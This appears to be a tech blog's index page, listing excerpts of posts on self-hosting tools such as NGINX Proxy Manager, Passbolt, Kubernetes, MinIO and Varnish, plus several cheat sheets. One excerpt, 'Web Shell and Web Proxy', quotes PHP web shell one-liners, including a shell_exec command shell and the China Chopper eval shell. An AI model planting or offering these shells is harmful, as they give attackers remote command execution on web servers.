NGINX Proxy Manager [Link] is an open-source tool that allows you to easily manage and configure NGINX servers for: A […]
Deploying a Self-Hosted Open-Source Password Manager with Passbolt
Passbolt’s CE (Community Edition) is an enterprise grade open-source [Link] multi-platform [Link] password manager. It is a great alternative to […]
Kubernetes Demo: Namespace + Secret + Deployment + Service + Ingress
In this post I will walk through all the steps of deploying a containerized web application and all the required […]
Deploying an S3 Compatible Block Storage Server with MinIO
MinIO [Link] is an open source [Link] high performance object storage API written in GO compatible with Amazon S3 cloud […]
Web Shell and Web Proxy
WEB SHELLS Classic <?php echo shell_exec($_GET[“cmd”]);?> China Chopper <?php @eval($_POST[‘password’]);?> Web Shell with UI <html><body><form method=”GET” name=”<?php echo basename($_SERVER[‘PHP_SELF’]); ?>”> […]
Installing CMS Made Simple on Ubuntu 20.04
It is an open source Content Management System (CMS) written in PHP with MySQL/MariaDB that provides developers and site owners […]
Setting Up a Private CDN with Varnish HTTP Cache on Ubuntu
Varnish HTTP Cache is a dedicated opensource application for caching HTTP requests made by the client to the server. It […]
AWS S3 Glacier Cheat Sheet (The Ultimate Backup Layer)
S3 Glacier is a block storage service of AWS that basically is only applicable to the “ultimate last backup resort” […]
Markdown Cheat Sheet
Markdown is a lightweight markup language for creating formatted text using a plain-text editor. It is recommended to use a […]
VBScript Cheat Sheet
Message Box Syntax Int = MsgBox(prompt[,buttons][,title][,helpfile,context]) Message Box Responses / Button Values 1 = vbOK 2 = vbCancel 3 = […]